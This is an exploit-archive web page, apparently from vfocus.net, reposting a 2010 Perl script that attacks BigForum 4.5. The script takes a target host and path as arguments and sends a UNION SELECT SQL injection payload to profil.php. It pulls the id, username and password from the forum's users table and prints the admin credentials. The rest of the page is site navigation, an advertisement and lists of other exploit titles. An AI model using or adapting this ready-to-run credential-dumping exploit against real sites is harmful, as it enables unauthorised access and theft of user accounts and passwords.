首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BigForum version 4.5 remote SQL injection exploit that dumps user table informat
来源:vfocus.net 作者:Ctacok 发布时间:2010-03-09  
# Exploit Title: BigForum 4.5 SQL INJECTION EXPLOIT
# Date: 07.03.2010
# Author: Ctacok
# Software Link: http://sourceforge.net/projects/npage-bigforum/
# Version: 4.5
# Tested on: Ubuntu 9.10

#!/usr/bin/perl

use LWP::Simple;

print "\n";

print "##############################################################\n";

print "# BigForum Version: 4.5 SQL INJECTION                        #\n";

print "# Author: Ctacok  (Russian)                                  #\n";

print "# Blog : www.Ctacok.ru                                       #\n";

print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";

print "# Require : Magic_quotes = Off                               #\n";

print "##############################################################\n";

if (@ARGV < 2)

{

print "\n Usage: exploit.pl [host] [path] ";

print "\n EX : exploit.pl www.localhost.com /path/ \n\n";

exit;

}

$host=$ARGV[0];

$path=$ARGV[1];

$vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users";

$doc = get($host.$path."profil.php?id=".$vuln."+--+");

if ($doc =~ /:::(.+):(.+):(.+):::/){

         print "\n[+] Admin id: : $1";

print "\n[+] Admin username: $2";

print "\n[+] Admin password: $3";

}



_________________________________________________________________
 Устали от СПАМа на рабочем месте? Возьмите решение от NextMail:
           http://www.nextcorp.ru/corp/virt.phtml




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QuickZip 4.x (.zip) Buffer Ove
·JITed exec notepad Shellcode
·QuickZip 4.x (.zip) 0day Local
·OpenSSL < 0.9.8l and previous
·FreeBSD and OpenBSD 'ftpd' NUL
·This Metasploit module will ex
·Linux Kernel 64bit Personality
·Orbital Viewer ORB File Parsin
·Netscape Navigator - Namoroka
·Easy FTP Server v1.7.0.2 CWD R
·Spamassassin Milter Plugin Rem
·JAD java decompiler 1.5.8g (ar
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved